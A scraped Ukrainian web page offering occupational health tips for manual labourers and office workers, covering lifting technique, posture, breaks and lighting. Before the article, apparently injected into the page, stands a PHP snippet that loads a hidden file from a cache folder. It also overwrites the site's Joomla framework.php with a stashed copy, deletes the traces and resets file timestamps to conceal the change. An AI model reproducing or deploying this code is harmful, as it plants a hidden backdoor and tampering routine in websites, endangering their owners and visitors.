$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Ваша професія і здоров'я | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Ваша професія і здоров'я

Є таке визначення «профзахворювання». І все, взагалі-то, зрозуміло: крім зарплати і трудових успіхів твоя улюблена (або вимушено-необхідна) професія дарує всілякі «подарунки» твоєму здоров'ю. Якщо це вважати природним і не вживати ніяких дій, то на пенсії ви про це пошкодуєте. Тому що замість відпочинку на березі з вудкою, будете сидіти в черзі до лікарів. Тому, навіть якщо ви вважаєте, що абсолютно здорові, саме час подумати про майбутнє.

Ваша праця пов'язана з важкими предметами?

- Під час роботи важкі предмети, якщо це можливо, краще поставити, а не тримати в руках. Піднімати ж їх слід двома руками, при цьому розставивши ноги на ширину плечей.

- Для запобігання зсуву міжхребцевого диска, перед підйомом важких предметів, корисно вдихнути і на якийсь час затримати дихання (як при підйомі штанги штангістами).

- Уникайте різких рухів тулубом, довго не стійте на прямих ногах. Їх треба періодично по черзі розслабляти.

- При підйомі важких предметів ноги треба трохи згинати в колінах. Щоб менше навантажувати хребет, повертатися краще після того, як вантаж вже піднятий.

- Важкі предмети, який ви піднімаєте, повині розташовуватися ближче до тулуба.

- Надмірно поспішати при перенесенні великого вантажу не варто.

- Вантажникам потрібно мати взуття з широкою рифленою підошвою. Також значно полегшують працю спеціальні пристосування, спеціально підібрані лямки, гаки.

- Намагайтесь полегшити свою працю, застосовуючи валики, візки, засоби механізації, автоматизації, транспорт.

- Не починайте роботу на порожній шлунок, але й переїдати теж не слід.

Якщо офіс ваш рідний дім?

- Під час роботи не слід постійно знаходитись в одній і тій ж позі. Через кожні 30-40 хвилин роботи в одноманітній позі робіть розминку протягом 5-10 хвилин (для пожвавлення кровообігу).

- Намагайтесь через кожні 10-15 хвилин міняти позу, положення спини, ніг. Хоча б трохи.

- Підгинання ніг під стілець несприятливе для ніг і кровообігу. Забороніть собі класти ногу на ногу.

- Шкідливо довго тримати на грудях схрещені руки: напружуються м'язи грудної клітки, рефлекторно пов'язані із серцем. Це для нього вкрай несприятливо, до того ж ускладнюється дихання.

- Шкідлива для м'язів шиї і надпліччя звичка утримувати телефонну трубку нахиленою набік головою.

- Освітлення кімнати та робочого місця повинно бути достатнім, без мерехтіння і шуму, які заважають роботі. На робочому столі краще мати настільну лампу. Звичайно, вона повинна стояти зліва.

- Велике значення для попередження радикуліту, остеохондрозу має правильна поза. Тому стояти або працювати сидячи слід з випрямленою спиною.

- Тривалі нахили тулуба, голови ускладнюють роботу органів дихання, серця, кровообігу головного мозку. Коли людина пише, її лікті повинні знаходитися на столі. Якщо ви читаєте, то лікті краще тримати під кутом в 45 градусів.

- Краще, якщо ваш стілець буде з регульованою висотою, підлокітниками і спинкою. До того ж такий стілець набагато підвищує продуктивність і комфорт.

- Одяг, краватку, ремінь і браслет годинника (корисніше шкіряний ремінець), не повинні бути тугими, щоб не погіршувати кровообіг.

- Дуже шкідливі постійний поспіх і ситуація, що вимагає одночасного виконання кількох справ. Поспішайте не поспішаючи.

 

За матеріалами сайту http://medproza.ru/
 
Харчування-здоровий спосіб життя Ваша професія і здоров'я